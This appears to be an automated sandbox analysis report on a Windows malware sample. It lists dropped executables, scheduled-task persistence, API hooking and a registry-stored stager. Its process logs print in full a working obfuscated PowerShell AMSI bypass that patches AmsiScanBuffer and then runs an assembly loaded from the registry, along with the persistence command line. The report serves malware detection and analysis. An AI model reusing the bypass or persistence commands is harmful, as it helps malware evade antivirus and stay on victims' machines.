Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: {$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)	Jump to behavior

Obfuscated command line found

Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qKHXRLjxcQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');$qKHXRLjxcQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NibVxWxTFc,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');Write-Output $qKHXRLjxcQb.CreateType();}$uYKrZWxknTiUv=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$SpNyfScDlNPPHB=$uYKrZWxknTiUv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RRmRtbQVOsCwqbtFCRP=oBYZxpoBuJDg @([String])([IntPtr]);$CSrLsWTvUKtnfJeCoYnQHQ=oBYZxpoBuJDg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LbwxtlPJWDL=$uYKrZWxknTiUv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$UsbtvKZkuSsHuw=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Load'+'LibraryA')));$GBWVSxTZRtiWMYLEL=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Vir'+'tual'+'Pro'+'tect')));$zcmbglj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsbtvKZkuSsHuw,$RRmRtbQVOsCwqbtFCRP).Invoke('a'+'m'+'si.dll');$NtWqUAjxRFzIehWzj=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$zcmbglj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$QZnCEHiAlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,4,[ref]$QZnCEHiAlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NtWqUAjxRFzIehWzj,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,0x20,[ref]$QZnCEHiAlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');Write-Output $JkETjFsAcrF.CreateType();}$lPmVEIqLxWSBJ=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oknnqNPEawtCof=$lPmVEIqLxWSBJ.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PfTqTVeTqNbzEtTZAwA=JcVEStQtPhkP @([String])([IntPtr]);$FBhryrsEcCEQMAYVVFmrjj=JcVEStQtPhkP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gdWNaSIjpXI=$lPmVEIqLxWSBJ.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$MwCkRVFOfjwTFV=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Load'+'LibraryA')));$PwfBMMcphOddVTLUY=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Vir'+'tual'+'Pro'+'tect')));$FyAgKxj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MwCkRVFOfjwTFV,$PfTqTVeTqNbzEtTZAwA).Invoke('a'+'m'+'si.dll');$GiLFGjttEZsjytHxc=$oknnqNPEawtCof.Invoke($Null,@([Object]$FyAgKxj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$XarcXAurwd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,4,[ref]$XarcXAurwd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GiLFGjttEZsjytHxc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,0x20,[ref]$XarcXAurwd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Roaming\34432.exe	Code function: 4_2_00007FFF7E40070C pushad ; ret	4_2_00007FFF7E40070E
Source: C:\Users\user\AppData\Roaming\34432.exe	Code function: 4_2_00007FFF7E4006CE pushad ; ret	4_2_00007FFF7E4006D0
Source: C:\Users\user\AppData\Roaming\34432.exe	Code function: 4_2_00007FFF7E4035CF push cs; iretd	4_2_00007FFF7E4035D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFF7E3F7317 push ebx; iretd	8_2_00007FFF7E3F731A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFF7E3F5097 push eax; iretd	8_2_00007FFF7E3F50A1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFF7E3F44E7 push esp; retf	8_2_00007FFF7E3F44E8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFF7E4C5274 pushad ; retf	8_2_00007FFF7E4C5275
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFF7E4C5F76 push ebx; retf	8_2_00007FFF7E4C5F78
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFF7E4C5C3C push esi; retf	8_2_00007FFF7E4C5C3D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFF7E4C6156 push ecx; retf	8_2_00007FFF7E4C6158
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_000000014000E228 push rax; retf	22_2_000000014000E229
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_000000014001439D push rcx; retf 003Fh	22_2_000000014001439E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FFF7E3E6450 push ebx; iretd	25_2_00007FFF7E3E645A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FFF7E3E41C7 push esp; retf	25_2_00007FFF7E3E41C8
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 30_2_00007FFF7E3F070C pushad ; ret	30_2_00007FFF7E3F070E
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 30_2_00007FFF7E3F06CE pushad ; ret	30_2_00007FFF7E3F06D0
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 30_2_00007FFF7E3F70FA push ebp; retf	30_2_00007FFF7E3F70FB
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 30_2_00007FFF7E3F35CF push cs; iretd	30_2_00007FFF7E3F35D1
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 33_2_00007FFF7E40070C pushad ; ret	33_2_00007FFF7E40070E
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 33_2_00007FFF7E4006CE pushad ; ret	33_2_00007FFF7E4006D0
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 33_2_00007FFF7E4035CF push cs; iretd	33_2_00007FFF7E4035D1
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_00000001400146AD push rcx; retf 003Fh	39_2_00000001400146AE
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_000000014000E348 push rax; retf	39_2_000000014000E351
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_000000014000E350 push rax; retf	39_2_000000014000E351
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDCE94CD push rcx; retf 003Fh	42_2_000001AFDDCE94CE
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD142D8 push rax; retf	42_2_000001AFDDD142D9
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD1A6CD push rcx; retf 003Fh	42_2_000001AFDDD1A6CE
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2B994CD push rcx; retf 003Fh	44_2_00000240B2B994CE
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2BC42D8 push rax; retf	44_2_00000240B2BC42D9
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3CE94CD push rcx; retf 003Fh	47_2_000001CAF3CE94CE
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3D142D0 push rax; retf	47_2_000001CAF3D142D9

PE file contains sections with non-standard names

Source: ChiefKeefofficialnaxyi_crypted(6).exe.1.dr	Static PE information: section name: .nQuHRq
Source: ChiefKeefofficialnaxyi_crypted(6).exe.1.dr	Static PE information: section name: .9SAT

Source: initial sample

Static PE information: section name: .9SAT entropy: 6.83589844593

Persistence and Installation Behavior

Creates files in the system32 config directory

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Drops PE files

Source: C:\Users\user\Desktop\Install.exe	File created: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\34432.exe	File created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Install.exe	File created: C:\Users\user\AppData\Roaming\34432.exe	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"

Creates job files (autostart)

Source: C:\Windows\System32\nslookup.exe

File created: C:\Windows\Tasks\nslooksvc32.job

Hooking and other Techniques for Hiding and Protection

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Hooks processes query functions (used to hide processes)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks files or directories query functions (used to hide files and directories)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x93 0x33 0x35 0x5D 0xDF

Stores large binary data to the registry

Source: C:\Windows\System32\nslookup.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node nslookstager

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\System32\winlogon.exe

42_2_000001AFDDD01F20

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\Install.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
